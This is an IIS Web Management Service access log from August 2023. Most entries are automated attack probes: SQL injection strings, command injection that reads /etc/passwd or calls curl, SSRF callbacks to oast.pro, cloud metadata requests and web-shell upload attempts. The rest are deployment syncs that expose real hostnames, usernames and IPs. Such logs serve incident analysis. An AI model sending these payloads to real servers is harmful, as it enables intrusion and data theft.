????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230802.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-02 00:12:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-02 00:12:20 103.153.214.94 POST /cobbler_api - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 79 2023-08-02 00:18:14 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 67 2023-08-02 00:18:23 103.153.214.94 GET /wp-admin/admin-ajax.php action=easync_success_and_save 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 74 2023-08-02 00:26:02 103.153.214.94 GET /ipython/tree - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 64 2023-08-02 00:39:04 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 60 2023-08-02 00:41:11 103.153.214.94 GET /duomiphp/ajax.php action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(999999999))) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 88 2023-08-02 00:43:52 103.153.214.94 POST /dashboard/proc.php type=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 59 2023-08-02 00:51:08 103.153.214.94 GET /comment/api/index.php gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@`%27` 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 91 2023-08-02 00:51:55 103.153.214.94 GET /v1/submissions - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 81 2023-08-02 00:54:12 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 81 2023-08-02 01:00:50 103.153.214.94 POST /assets/php/upload.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://bcvt.kontum.gov.vn:8172 404 7 0 74 2023-08-02 01:00:59 103.153.214.94 GET /assets/data/usrimg/2to9gulzgvz6sn7jrowllexwoo8.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 57 2023-08-02 01:08:00 103.153.214.94 POST /index.php m=member&f=login_save 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 78 2023-08-02 01:12:13 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 60 2023-08-02 01:12:22 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 77 2023-08-02 01:16:47 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 199 2023-08-02 01:16:54 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 60 2023-08-02 01:17:08 103.153.214.94 GET /latest/meta-data/ - 8172 - 111.90.143.37 - - 404 7 0 74 2023-08-02 01:22:01 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 62 2023-08-02 01:26:58 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 59 2023-08-02 01:35:46 103.153.214.94 GET /wp-admin/admin-ajax.php action=formcraft3_get&URL=https://cj4i6mq47492iin2kjb0z6wmycxzywmua.oast.pro 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 61 2023-08-02 01:40:32 103.153.214.94 GET /install - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 71 2023-08-02 01:40:35 103.153.214.94 POST /servlets/OmaDsServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 54 2023-08-02 01:47:57 103.153.214.94 POST /wp-admin/admin-ajax.php image_id=123 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 92 2023-08-02 01:53:50 103.153.214.94 GET /my-account/ alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 59 2023-08-02 01:53:57 103.153.214.94 GET / alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 78 2023-08-02 01:55:58 103.153.214.94 GET /search/members/ id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 75 2023-08-02 01:57:06 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 96 2023-08-02 02:00:38 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 74 2023-08-02 02:05:36 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 14 2023-08-02 02:05:36 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 26 2023-08-02 02:05:36 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2023-08-02 02:05:36 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 430 2023-08-02 02:05:36 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=630e8b96-f26c-4097-9d6a-d2d7a3f33f7d;op=Sync - 200 0 0 376 2023-08-02 02:05:36 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10 2023-08-02 02:06:14 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=630e8b96-f26c-4097-9d6a-d2d7a3f33f7d;op=Sync - 200 0 0 37865 2023-08-02 02:06:14 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 37915 2023-08-02 02:10:59 103.153.214.94 GET /about_state - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 69 2023-08-02 02:11:52 103.153.214.94 POST /goform/setmac - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.htmlr 404 7 0 77 2023-08-02 02:15:31 103.153.214.94 POST /sysShell - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 84 2023-08-02 02:23:02 103.153.214.94 GET /Items/RemoteSearch/Image ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 64 2023-08-02 02:24:49 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 65 2023-08-02 02:33:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 171.231.145.175 - - 401 2 5 47 2023-08-02 02:33:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 65 2023-08-02 02:33:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 80 2023-08-02 02:33:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 1007 2023-08-02 02:33:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=9a191f58-c096-43b9-8ed3-817319ea728c;op=Sync - 200 0 0 502 2023-08-02 02:33:12 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 29 2023-08-02 02:33:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 572 2023-08-02 02:33:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=9a191f58-c096-43b9-8ed3-817319ea728c;op=Sync - 200 0 0 463 2023-08-02 02:34:12 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 56 2023-08-02 02:39:36 103.153.214.94 POST /eps/resourceOperations/upload.action - 8172 - 111.90.143.37 MicroMessenger - 404 7 0 81 2023-08-02 02:39:37 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 28 2023-08-02 02:39:37 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 29 2023-08-02 02:39:37 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=33564605-db62-4fc6-bd0a-cc90eaf74987;op=Sync - 200 0 0 183 2023-08-02 02:39:37 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 282 2023-08-02 02:39:37 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 26 2023-08-02 02:39:42 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 - - 200 0 0 4586 2023-08-02 02:39:42 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.145.175 VSCmdLine:WTE6.0.6.36821;sid=33564605-db62-4fc6-bd0a-cc90eaf74987;op=Sync - 200 0 0 4496 2023-08-02 02:41:48 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 81 2023-08-02 02:43:35 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 95 2023-08-02 02:43:42 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 54 2023-08-02 02:43:50 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 81 2023-08-02 02:43:57 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 78 2023-08-02 02:44:06 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 57 2023-08-02 02:44:14 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 85 2023-08-02 02:44:20 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 82 2023-08-02 02:44:28 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 61 2023-08-02 02:44:35 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 59 2023-08-02 02:44:43 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 96 2023-08-02 02:44:50 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 53 2023-08-02 02:44:57 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 54 2023-08-02 02:45:04 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 53 2023-08-02 02:45:12 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 55 2023-08-02 02:45:16 103.153.214.94 GET /Admin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 78 2023-08-02 02:45:19 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 76 2023-08-02 02:45:27 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 88 2023-08-02 02:45:34 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 79 2023-08-02 02:45:41 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 80 2023-08-02 02:45:51 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79 2023-08-02 02:46:01 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 99 2023-08-02 02:46:11 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 54 2023-08-02 02:46:23 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 79 2023-08-02 02:46:33 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 66 2023-08-02 02:46:44 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 55 2023-08-02 02:46:54 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 80 2023-08-02 02:47:04 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 88 2023-08-02 02:47:12 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79 2023-08-02 02:47:22 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 83 2023-08-02 02:47:32 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 77 2023-08-02 02:47:40 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 55 2023-08-02 02:47:49 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 54 2023-08-02 02:47:59 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 78 2023-08-02 02:48:08 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 83 2023-08-02 02:48:17 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 80 2023-08-02 02:48:26 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 84 2023-08-02 02:48:36 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 55 2023-08-02 02:48:45 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 55 2023-08-02 02:48:55 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 79 2023-08-02 02:49:03 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58 2023-08-02 02:49:12 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 54 2023-08-02 02:49:21 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 54 2023-08-02 02:49:30 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 54 2023-08-02 02:49:39 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 56 2023-08-02 02:49:47 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 77 2023-08-02 02:49:58 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 77 2023-08-02 02:53:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 31 2023-08-02 02:53:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 35 2023-08-02 02:53:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 36 2023-08-02 02:53:54 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=53a8a09a-752d-4c1e-81cb-71f337e03737;op=Sync - 200 0 0 266 2023-08-02 02:53:54 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 339 2023-08-02 02:53:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10 2023-08-02 02:54:32 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=53a8a09a-752d-4c1e-81cb-71f337e03737;op=Sync - 200 0 0 37943 2023-08-02 02:54:32 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 37974 2023-08-02 02:55:45 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 61 2023-08-02 02:55:54 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/xzzgta/sc.php - 8172 - 111.90.143.37 